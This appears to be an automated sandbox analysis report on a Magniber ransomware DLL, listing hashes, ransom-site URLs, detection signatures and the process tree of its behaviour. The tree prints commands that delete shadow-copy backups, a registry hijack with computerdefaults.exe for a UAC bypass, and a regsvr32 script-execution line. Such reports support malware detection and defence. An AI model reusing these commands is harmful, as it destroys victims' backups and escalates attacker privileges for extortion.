Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2023 17:22
Static task
static1
Behavioral task
behavioral1
Sample
3088d9d808dd030a756633437f351b13.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3088d9d808dd030a756633437f351b13.dll
Resource
win10v2004-20231215-en
General
-
Target
3088d9d808dd030a756633437f351b13.dll
-
Size
33KB
-
MD5
3088d9d808dd030a756633437f351b13
-
SHA1
a4e78428c7aa5f14681a313fd3f92c9267e9469a
-
SHA256
9209b297a4d3af1a82e4a60fa45fa558f08a502ebcf5dc2fa487505fd72be331
-
SHA512
2db4cc645b040f5e5e73d61db8342b40b5fd592ad96b5187d8513e5fd6864da6306ebc887b58df7ebf94f00aac703a3acfe30e326bd9bf7eec49a27276d75b70
-
SSDEEP
768:JxnHytUcpkucln36De22PJNFai4OLS5wz3YKUt4fSsDZ:J0DkVV6Dh2dHrdzrbNZ
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://7278d0001c94b63022emkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy
http://7278d0001c94b63022emkyhecy.mixedon.xyz/emkyhecy
http://7278d0001c94b63022emkyhecy.actmake.site/emkyhecy
http://7278d0001c94b63022emkyhecy.spiteor.space/emkyhecy
http://7278d0001c94b63022emkyhecy.bearsat.space/emkyhecy
Signatures
-
Detect magniber ransomware 1 IoCs
resource yara_rule behavioral2/memory/4492-23-0x000001A664DD0000-0x000001A665715000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 860 3200 cmd.exe 104 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3972 3200 cmd.exe 104 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 3200 vssadmin.exe 104 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 3200 vssadmin.exe 104 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4824 3200 vssadmin.exe 104 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (91) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4824 vssadmin.exe 4292 vssadmin.exe 4520 vssadmin.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell\open rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4360 notepad.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2012 msedge.exe 2012 msedge.exe 1860 msedge.exe 1860 msedge.exe 4512 identity_helper.exe 4512 identity_helper.exe 5200 msedge.exe 5200 msedge.exe 5200 msedge.exe 5200 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4404 wmic.exe Token: SeSecurityPrivilege 4404 wmic.exe Token: SeTakeOwnershipPrivilege 4404 wmic.exe Token: SeLoadDriverPrivilege 4404 wmic.exe Token: SeSystemProfilePrivilege 4404 wmic.exe Token: SeSystemtimePrivilege 4404 wmic.exe Token: SeProfSingleProcessPrivilege 4404 wmic.exe Token: SeIncBasePriorityPrivilege 4404 wmic.exe Token: SeCreatePagefilePrivilege 4404 wmic.exe Token: SeBackupPrivilege 4404 wmic.exe Token: SeRestorePrivilege 4404 wmic.exe Token: SeShutdownPrivilege 4404 wmic.exe Token: SeDebugPrivilege 4404 wmic.exe Token: SeSystemEnvironmentPrivilege 4404 wmic.exe Token: SeRemoteShutdownPrivilege 4404 wmic.exe Token: SeUndockPrivilege 4404 wmic.exe Token: SeManageVolumePrivilege 4404 wmic.exe Token: 33 4404 wmic.exe Token: 34 4404 wmic.exe Token: 35 4404 wmic.exe Token: 36 4404 wmic.exe Token: SeIncreaseQuotaPrivilege 3428 WMIC.exe Token: SeSecurityPrivilege 3428 WMIC.exe Token: SeTakeOwnershipPrivilege 3428 WMIC.exe Token: SeLoadDriverPrivilege 3428 WMIC.exe Token: SeSystemProfilePrivilege 3428 WMIC.exe Token: SeSystemtimePrivilege 3428 WMIC.exe Token: SeProfSingleProcessPrivilege 3428 WMIC.exe Token: SeIncBasePriorityPrivilege 3428 WMIC.exe Token: SeCreatePagefilePrivilege 3428 WMIC.exe Token: SeBackupPrivilege 3428 WMIC.exe Token: SeRestorePrivilege 3428 WMIC.exe Token: SeShutdownPrivilege 3428 WMIC.exe Token: SeDebugPrivilege 3428 WMIC.exe Token: SeSystemEnvironmentPrivilege 3428 WMIC.exe Token: SeRemoteShutdownPrivilege 3428 WMIC.exe Token: SeUndockPrivilege 3428 WMIC.exe Token: SeManageVolumePrivilege 3428 WMIC.exe Token: 33 3428 WMIC.exe Token: 34 3428 WMIC.exe Token: 35 3428 WMIC.exe Token: 36 3428 WMIC.exe Token: SeIncreaseQuotaPrivilege 4404 wmic.exe Token: SeSecurityPrivilege 4404 wmic.exe Token: SeTakeOwnershipPrivilege 4404 wmic.exe Token: SeLoadDriverPrivilege 4404 wmic.exe Token: SeSystemProfilePrivilege 4404 wmic.exe Token: SeSystemtimePrivilege 4404 wmic.exe Token: SeProfSingleProcessPrivilege 4404 wmic.exe Token: SeIncBasePriorityPrivilege 4404 wmic.exe Token: SeCreatePagefilePrivilege 4404 wmic.exe Token: SeBackupPrivilege 4404 wmic.exe Token: SeRestorePrivilege 4404 wmic.exe Token: SeShutdownPrivilege 4404 wmic.exe Token: SeDebugPrivilege 4404 wmic.exe Token: SeSystemEnvironmentPrivilege 4404 wmic.exe Token: SeRemoteShutdownPrivilege 4404 wmic.exe Token: SeUndockPrivilege 4404 wmic.exe Token: SeManageVolumePrivilege 4404 wmic.exe Token: 33 4404 wmic.exe Token: 34 4404 wmic.exe Token: 35 4404 wmic.exe Token: 36 4404 wmic.exe Token: SeIncreaseQuotaPrivilege 384 WMIC.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe 1860 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4492 wrote to memory of 4360 4492 rundll32.exe 92 PID 4492 wrote to memory of 4360 4492 rundll32.exe 92 PID 4492 wrote to memory of 3860 4492 rundll32.exe 93 PID 4492 wrote to memory of 3860 4492 rundll32.exe 93 PID 4492 wrote to memory of 4404 4492 rundll32.exe 94 PID 4492 wrote to memory of 4404 4492 rundll32.exe 94 PID 4492 wrote to memory of 1432 4492 rundll32.exe 96 PID 4492 wrote to memory of 1432 4492 rundll32.exe 96 PID 4492 wrote to memory of 2576 4492 rundll32.exe 98 PID 4492 wrote to memory of 2576 4492 rundll32.exe 98 PID 2576 wrote to memory of 3428 2576 cmd.exe 102 PID 2576 wrote to memory of 3428 2576 cmd.exe 102 PID 1432 wrote to memory of 384 1432 cmd.exe 103 PID 1432 wrote to memory of 384 1432 cmd.exe 103 PID 3860 wrote to memory of 1860 3860 cmd.exe 112 PID 3860 wrote to memory of 1860 3860 cmd.exe 112 PID 860 wrote to memory of 1440 860 cmd.exe 114 PID 860 wrote to memory of 1440 860 cmd.exe 114 PID 1860 wrote to memory of 920 1860 msedge.exe 115 PID 1860 wrote to memory of 920 1860 msedge.exe 115 PID 3972 wrote to memory of 1032 3972 cmd.exe 116 PID 3972 wrote to memory of 1032 3972 cmd.exe 116 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2544 1860 msedge.exe 119 PID 1860 wrote to memory of 2012 1860 msedge.exe 118 PID 1860 wrote to memory of 2012 1860 msedge.exe 118 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3088d9d808dd030a756633437f351b13.dll,#11⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4360
-
-
C:\Windows\system32\cmd.execmd /c "start http://7278d0001c94b63022emkyhecy.mixedon.xyz/emkyhecy^&2^&36193358^&91^&381^&2219041"2⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://7278d0001c94b63022emkyhecy.mixedon.xyz/emkyhecy&2&36193358&91&381&22190413⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe275a46f8,0x7ffe275a4708,0x7ffe275a47184⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:84⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:14⤵PID:1876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:14⤵PID:2108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:14⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:14⤵PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:84⤵PID:2168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:14⤵PID:1440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:14⤵PID:288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:14⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:14⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:14⤵PID:4756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:14⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4044554570619733020,13115664323206498201,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3996 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:5200
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1440
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:744
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1032
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:304
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4292
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4760
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3032
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:296
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4520
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4824
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD55e77545b7e1c504b2f5ce7c5cc2ce1fe
SHA1d81a6af13cf31fa410b85471e4509124ebeaff7e
SHA256cbb617cd6cde793f367df016b200d35ce3c521ab901bbcb52928576bb180bc11
SHA512cbc65c61334a8b18ece79acdb30a4af80aa9448c3edc3902b00eb48fd5038bf6013d1f3f6436c1bcb637e78c485ae8e352839ca3c9ddf7e45b3b82d23b0e6e37
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD5f37db64b87713bac6a029848a3e34b7f
SHA1fe46334ba8068655b12443309d2ef575ca51f0ca
SHA25638fea46a12e5df61e5dc89d1a16b18c30c3b3d0e2820804d330533fd1607dffb
SHA512286b9020d73815305fed72f8dc8103c2b5833da9b5f3d4365e70dc06c2692e238e9016a556a19fc2da97e06d6ee89ff61c8e906999d6672a9f4c69bdfe96e5a2
-
Filesize
5KB
MD5da7c2f85eb77901025b9525ae7e3ae9a
SHA1ea5c585d0efd895c62e0514210b08488bdcac287
SHA256cd6579de26daedc2932a6712aae01bdb86a4c5718d72728dcd3d74ea89b528ae
SHA5124efec2ce3e6a3160f521d290afd1a6a3f855826258c412066434d1b26fdadb13ae6ad9a677d931e77f2d840bd5cbd93335cd27824913744004d82ff37ab7d398
-
Filesize
24KB
MD56db2d2ceb22a030bd1caa72b32cfbf98
SHA1fe50f35e60f88624a28b93b8a76be1377957618b
SHA2567b22b0b16088ab7f7d6f938d7cfe9ae807856662ce3a63e7de6c8107186853e4
SHA512d5a67a394003f559c98e1a1e9e31c2d473d04cc075b08bb0aab115ce42744da536895df2cec73fa54fc36f38d38e4906680cfacfbf4698ee925f1609fbb07912
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD51feb1ecaf45965b3136c6680f5ae47e7
SHA1778aa8832eb707ebabdd072b024c4359259b967d
SHA25602661b68804fb6f008c9749ad60e5e94c77dc4b63a0a906166f7368b967a463e
SHA512f52b98e3fe3702cf0d1fd74f6b09bf3173aafb0ac59888a6bc83efb96e8e95f3c595e83f44fb784a3b71ade8854e4d6f9cba5ffa8e6ef31375b73e3242c72ba7
-
Filesize
1KB
MD5b1ae9964a76a7db75b52bfa1b62c18e7
SHA17914f3cb2d4cd9d014087d2dda5d3e4d5497b4ce
SHA2565fda2a6c182deba6bf7fd71148d7a3baa96a0a99a7efa4d466e914ecbfa8ec09
SHA512509201376e46158f8d3a4a08d75cb247528bb0d844a6a0f0d50ef1341e5287cbdf9f83996ba3e3efa7ce8c9443d0e0c5bd76acc86136183bc1ed914f15c9930e